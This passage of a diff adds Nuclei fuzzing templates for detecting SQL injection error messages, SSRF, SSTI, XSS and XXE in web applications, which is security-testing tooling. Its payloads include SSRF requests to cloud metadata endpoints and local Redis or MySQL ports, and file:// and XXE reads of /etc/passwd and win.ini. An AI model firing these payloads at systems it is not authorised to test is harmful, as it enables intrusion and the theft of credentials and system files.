- "check the manual that (corresponds to|fits) your MariaDB server version"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: drizzel
|
||||||
|
regex:
|
||||||
|
- "check the manual that (corresponds to|fits) your Drizzle server version"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: memsql
|
||||||
|
regex:
|
||||||
|
- "MemSQL does not support this type of query"
|
||||||
|
- "is not supported by MemSQL"
|
||||||
|
- "unsupported nested scalar subselect"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: postgresql
|
||||||
|
regex:
|
||||||
|
- "PostgreSQL.*?ERROR"
|
||||||
|
- "Warning.*?\\Wpg_"
|
||||||
|
- "valid PostgreSQL result"
|
||||||
|
- "Npgsql\\."
|
||||||
|
- "PG::SyntaxError:"
|
||||||
|
- "org\\.postgresql\\.util\\.PSQLException"
|
||||||
|
- "ERROR:\\s\\ssyntax error at or near"
|
||||||
|
- "ERROR: parser: parse error at or near"
|
||||||
|
- "PostgreSQL query failed"
|
||||||
|
- "org\\.postgresql\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\]Pgsql"
|
||||||
|
- "PSQLException"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: microsoftsqlserver
|
||||||
|
regex:
|
||||||
|
- "Driver.*? SQL[\\-\\_\\ ]*Server"
|
||||||
|
- "OLE DB.*? SQL Server"
|
||||||
|
- "\\bSQL Server[^<"]+Driver"
|
||||||
|
- "Warning.*?\\W(mssql|sqlsrv)_"
|
||||||
|
- "\\bSQL Server[^<"]+[0-9a-fA-F]{8}"
|
||||||
|
- "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)"
|
||||||
|
- "(?s)Exception.*?\\bRoadhouse\\.Cms\\."
|
||||||
|
- "Microsoft SQL Native Client error '[0-9a-fA-F]{8}"
|
||||||
|
- "\\[SQL Server\\]"
|
||||||
|
- "ODBC SQL Server Driver"
|
||||||
|
- "ODBC Driver \\d+ for SQL Server"
|
||||||
|
- "SQLServer JDBC Driver"
|
||||||
|
- "com\\.jnetdirect\\.jsql"
|
||||||
|
- "macromedia\\.jdbc\\.sqlserver"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"
|
||||||
|
- "com\\.microsoft\\.sqlserver\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\](Mssql|SqlSrv)"
|
||||||
|
- "SQL(Srv|Server)Exception"
|
||||||
|
- "Unclosed quotation mark after the character string"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: microsoftaccess
|
||||||
|
regex:
|
||||||
|
- "Microsoft Access (\\d+ )?Driver"
|
||||||
|
- "JET Database Engine"
|
||||||
|
- "Access Database Engine"
|
||||||
|
- "ODBC Microsoft Access"
|
||||||
|
- "Syntax error \\(missing operator\\) in query expression"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: oracle
|
||||||
|
regex:
|
||||||
|
- "\\bORA-\\d{5}"
|
||||||
|
- "Oracle error"
|
||||||
|
- "Oracle.*?Driver"
|
||||||
|
- "Warning.*?\\W(oci|ora)_"
|
||||||
|
- "quoted string not properly terminated"
|
||||||
|
- "SQL command not properly ended"
|
||||||
|
- "macromedia\\.jdbc\\.oracle"
|
||||||
|
- "oracle\\.jdbc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Oracle_Exception"
|
||||||
|
- "Pdo[./_\\\\](Oracle|OCI)"
|
||||||
|
- "OracleException"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: ibmdb2
|
||||||
|
regex:
|
||||||
|
- "CLI Driver.*?DB2"
|
||||||
|
- "DB2 SQL error"
|
||||||
|
- "\\bdb2_\\w+\\("
|
||||||
|
- "SQLCODE[=:\\d, -]+SQLSTATE"
|
||||||
|
- "com\\.ibm\\.db2\\.jcc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Db2_Exception"
|
||||||
|
- "Pdo[./_\\\\]Ibm"
|
||||||
|
- "DB2Exception"
|
||||||
|
- "ibm_db_dbi\\.ProgrammingError"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: informix
|
||||||
|
regex:
|
||||||
|
- "Warning.*?\\Wifx_"
|
||||||
|
- "Exception.*?Informix"
|
||||||
|
- "Informix ODBC Driver"
|
||||||
|
- "ODBC Informix driver"
|
||||||
|
- "com\\.informix\\.jdbc"
|
||||||
|
- "weblogic\\.jdbc\\.informix"
|
||||||
|
- "Pdo[./_\\\\]Informix"
|
||||||
|
- "IfxException"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: firebird
|
||||||
|
regex:
|
||||||
|
- "Dynamic SQL Error"
|
||||||
|
- "Warning.*?\\Wibase_"
|
||||||
|
- "org\\.firebirdsql\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\]Firebird"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: sqlite
|
||||||
|
regex:
|
||||||
|
- "SQLite/JDBCDriver"
|
||||||
|
- "SQLite\\.Exception"
|
||||||
|
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
|
||||||
|
- "Warning.*?\\W(sqlite_|SQLite3::)"
|
||||||
|
- "\\[SQLITE_ERROR\\]"
|
||||||
|
- "SQLite error \\d+:"
|
||||||
|
- "sqlite3.OperationalError:"
|
||||||
|
- "SQLite3::SQLException"
|
||||||
|
- "org\\.sqlite\\.JDBC"
|
||||||
|
- "Pdo[./_\\\\]Sqlite"
|
||||||
|
- "SQLiteException"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: sapmaxdb
|
||||||
|
regex:
|
||||||
|
- "SQL error.*?POS([0-9]+)"
|
||||||
|
- "Warning.*?\\Wmaxdb_"
|
||||||
|
- "DriverSapDB"
|
||||||
|
- "-3014.*?Invalid end of SQL statement"
|
||||||
|
- "com\\.sap\\.dbtech\\.jdbc"
|
||||||
|
- "\\[-3008\\].*?: Invalid keyword or missing delimiter"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: sybase
|
||||||
|
regex:
|
||||||
|
- "Warning.*?\\Wsybase_"
|
||||||
|
- "Sybase message"
|
||||||
|
- "Sybase.*?Server message"
|
||||||
|
- "SybSQLException"
|
||||||
|
- "Sybase\\.Data\\.AseClient"
|
||||||
|
- "com\\.sybase\\.jdbc"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: ingres
|
||||||
|
regex:
|
||||||
|
- "Warning.*?\\Wingres_"
|
||||||
|
- "Ingres SQLSTATE"
|
||||||
|
- "Ingres\\W.*?Driver"
|
||||||
|
- "com\\.ingres\\.gcf\\.jdbc"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: frontbase
|
||||||
|
regex:
|
||||||
|
- "Exception (condition )?\\d+\\. Transaction rollback"
|
||||||
|
- "com\\.frontbase\\.jdbc"
|
||||||
|
- "Syntax error 1. Missing"
|
||||||
|
- "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\."
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: hsqldb
|
||||||
|
regex:
|
||||||
|
- "Unexpected end of command in statement \\["
|
||||||
|
- "Unexpected token.*?in statement \\["
|
||||||
|
- "org\\.hsqldb\\.jdbc"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: h2
|
||||||
|
regex:
|
||||||
|
- "org\\.h2\\.jdbc"
|
||||||
|
- "\\[42000-192\\]"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: monetdb
|
||||||
|
regex:
|
||||||
|
- "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
|
||||||
|
- "\\[MonetDB\\]\\[ODBC Driver"
|
||||||
|
- "nl\\.cwi\\.monetdb\\.jdbc"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: apachederby
|
||||||
|
regex:
|
||||||
|
- "Syntax error: Encountered"
|
||||||
|
- "org\\.apache\\.derby"
|
||||||
|
- "ERROR 42X01"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: vertica
|
||||||
|
regex:
|
||||||
|
- ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"
|
||||||
|
- "/vertica/Parser/scan"
|
||||||
|
- "com\\.vertica\\.jdbc"
|
||||||
|
- "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
|
||||||
|
- "com\\.vertica\\.dsi\\.dataengine"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: mckoi
|
||||||
|
regex:
|
||||||
|
- "com\\.mckoi\\.JDBCDriver"
|
||||||
|
- "com\\.mckoi\\.database\\.jdbc"
|
||||||
|
- "<REGEX_LITERAL>"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: presto
|
||||||
|
regex:
|
||||||
|
- "com\\.facebook\\.presto\\.jdbc"
|
||||||
|
- "io\\.prestosql\\.jdbc"
|
||||||
|
- "com\\.simba\\.presto\\.jdbc"
|
||||||
|
- "UNION query has different number of fields: \\d+, \\d+"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: altibase
|
||||||
|
regex:
|
||||||
|
- "Altibase\\.jdbc\\.driver"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: mimersql
|
||||||
|
regex:
|
||||||
|
- "com\\.mimer\\.jdbc"
|
||||||
|
- "Syntax error,[^\\n]+assumed to mean"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: cratedb
|
||||||
|
regex:
|
||||||
|
- "io\\.crate\\.client\\.jdbc"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: cache
|
||||||
|
regex:
|
||||||
|
- "encountered after end of query"
|
||||||
|
- "A comparison operator is required here"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: raimadatabasemanager
|
||||||
|
regex:
|
||||||
|
- "-10048: Syntax error"
|
||||||
|
- "rdmStmtPrepare\\(.+?\\) returned"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: virtuoso
|
||||||
|
regex:
|
||||||
|
- "SQ074: Line \\d+:"
|
||||||
|
- "SR185: Undefined procedure"
|
||||||
|
- "SQ200: No table "
|
||||||
|
- "Virtuoso S0002 Error"
|
||||||
|
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: blind-ssrf
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Blind SSRF OAST Detection
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
tags: ssrf,dast,oast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
ssrf:
|
||||||
|
- "{{interactsh-url}}"
|
||||||
|
- "{{FQDN}}.{{interactsh-url}}"
|
||||||
|
- "{{RDN}}.{{interactsh-url}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
values:
|
||||||
|
- "https?://" # Replace HTTP URLs with alternatives
|
||||||
|
fuzz:
|
||||||
|
- "https://{{ssrf}}"
|
||||||
|
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
values:
|
||||||
|
- "^[A-Za-z0-9-._]+:[0-9]+$" # Replace <host>:<port> with alternative
|
||||||
|
fuzz:
|
||||||
|
- "{{ssrf}}:80"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,127 @@
|
||||||
|
id: response-ssrf
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Full Response SSRF Detection
|
||||||
|
author: pdteam,pwnhxl,j4vaovo
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
|
||||||
|
tags: ssrf,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
ssrf:
|
||||||
|
- 'http://{{interactsh-url}}'
|
||||||
|
- 'http://{{FQDN}}.{{interactsh-url}}'
|
||||||
|
- 'http://{{RDN}}.{{interactsh-url}}'
|
||||||
|
- 'file:////./etc/./passwd'
|
||||||
|
- 'file:///c:/./windows/./win.ini'
|
||||||
|
- 'http://metadata.tencentyun.com/latest/meta-data/'
|
||||||
|
- 'http://100.100.100.200/latest/meta-data/'
|
||||||
|
- 'http://169.254.169.254/latest/meta-data/'
|
||||||
|
- 'http://169.254.169.254/metadata/v1'
|
||||||
|
- 'http://127.0.0.1:22'
|
||||||
|
- 'http://127.0.0.1:3306'
|
||||||
|
- 'dict://127.0.0.1:6379/info'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
keys:
|
||||||
|
- callback
|
||||||
|
- continue
|
||||||
|
- data
|
||||||
|
- dest
|
||||||
|
- dir
|
||||||
|
- domain
|
||||||
|
- feed
|
||||||
|
- file
|
||||||
|
- host
|
||||||
|
- html
|
||||||
|
- imgurl
|
||||||
|
- navigation
|
||||||
|
- next
|
||||||
|
- open
|
||||||
|
- out
|
||||||
|
- page
|
||||||
|
- path
|
||||||
|
- port
|
||||||
|
- redirect
|
||||||
|
- reference
|
||||||
|
- return
|
||||||
|
- show
|
||||||
|
- site
|
||||||
|
- to
|
||||||
|
- uri
|
||||||
|
- url
|
||||||
|
- val
|
||||||
|
- validate
|
||||||
|
- view
|
||||||
|
- window
|
||||||
|
fuzz:
|
||||||
|
- "{{ssrf}}"
|
||||||
|
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
values:
|
||||||
|
- "(https|http|file)(%3A%2F%2F|://)(.*?)"
|
||||||
|
fuzz:
|
||||||
|
- "{{ssrf}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Interactsh Server"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'SSH-(\d.\d)-OpenSSH_(\d.\d)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(\d.\d.\d)(.*?)mysql_native_password'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'for 16-bit app support'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'dns-conf\/[\s\S]+instance\/'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'app-id[\s\S]+placement\/'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'ami-id[\s\S]+placement\/'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'id[\s\S]+interfaces\/'
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: reflection-ssti
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Reflected SSTI Arithmetic Based
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
reference:
|
||||||
|
- https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java
|
||||||
|
- https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update
|
||||||
|
tags: ssti,dast,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
first: "{{rand_int(1000, 9999)}}"
|
||||||
|
second: "{{rand_int(1000, 9999)}}"
|
||||||
|
result: "{{to_number(first)*to_number(second)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
|
payloads:
|
||||||
|
ssti:
|
||||||
|
- '{{concat("${", "{{first}}*{{second}}", "}")}}'
|
||||||
|
- '{{concat("{{", "{{first}}*{{second}}", "}}")}}'
|
||||||
|
- '{{concat("<%=", "{{first}}*{{second}}", "%>")}}'
|
||||||
|
- '{{concat("{", "{{first}}*{{second}}", "}")}}'
|
||||||
|
- '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}'
|
||||||
|
- '{{concat("${{", "{{first}}*{{second}}", "}}")}}'
|
||||||
|
- '{{concat("#{", "{{first}}*{{second}}", "}")}}'
|
||||||
|
- '{{concat("[[", "{{first}}*{{second}}", "]]")}}'
|
||||||
|
- '{{concat("{{=", "{{first}}*{{second}}", "}}")}}'
|
||||||
|
- '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}'
|
||||||
|
- '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}'
|
||||||
|
- '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}'
|
||||||
|
- '{{concat("@(", "{{first}}*{{second}}", ")")}}'
|
||||||
|
- '{{concat("{@", "{{first}}*{{second}}", "}")}}'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
fuzz:
|
||||||
|
- "{{ssti}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "{{result}}"
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: dom-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DOM Cross Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
tags: xss,dom,dast,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
num: "{{rand_int(10000, 99999)}}"
|
||||||
|
|
||||||
|
headless:
|
||||||
|
- steps:
|
||||||
|
- action: navigate
|
||||||
|
args:
|
||||||
|
url: "{{BaseURL}}"
|
||||||
|
- action: waitload
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
reflection:
|
||||||
|
- "'\"><h1>{{num}}</h1>"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
mode: single
|
||||||
|
fuzz:
|
||||||
|
- "{{reflection}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<h1>{{num}}</h1>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: reflected-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Reflected Cross Site Scripting
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
tags: xss,rxss,dast,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
first: "{{rand_int(10000, 99999)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
reflection:
|
||||||
|
- "'\"><{{first}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
mode: single
|
||||||
|
fuzz:
|
||||||
|
- "{{reflection}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "{{reflection}}"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: fuzz-xxe
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: XXE Fuzzing
|
||||||
|
author: pwnhxl
|
||||||
|
severity: medium
|
||||||
|
reference:
|
||||||
|
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
|
||||||
|
tags: dast,xxe,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rletter: "{{rand_base(6,'abc')}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
xxe:
|
||||||
|
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
|
||||||
|
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
keys-regex:
|
||||||
|
- "(.*?)xml(.*?)"
|
||||||
|
fuzz:
|
||||||
|
- "{{xxe}}"
|
||||||
|
|
||||||
|
- part: query
|
||||||
|
values:
|
||||||
|
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
|
||||||
|
fuzz:
|
||||||
|
- "{{xxe}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
name: linux
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: windows
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'for 16-bit app support'
|
|
@ -3,49 +3,52 @@ id: xss-fuzz
|
||||||
info:
|
info:
|
||||||
name: Fuzzing Parameters - Cross-Site Scripting
|
name: Fuzzing Parameters - Cross-Site Scripting
|
||||||
author: kazet
|
author: kazet
|
||||||
severity: high
|
severity: medium
|
||||||
description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
|
description: |
|
||||||
|
Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
||||||
cvss-score: 7.2
|
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 29
|
max-request: 29
|
||||||
parameters: "q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year"
|
parameters: "q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year"
|
||||||
tags: xss,generic,fuzz
|
tags: xss,generic
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E"
|
- "{{BaseURL}}/?{{xss_param}}"
|
||||||
- "{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E"
|
|
||||||
- "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E"
|
payloads:
|
||||||
- "{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E"
|
xss_param:
|
||||||
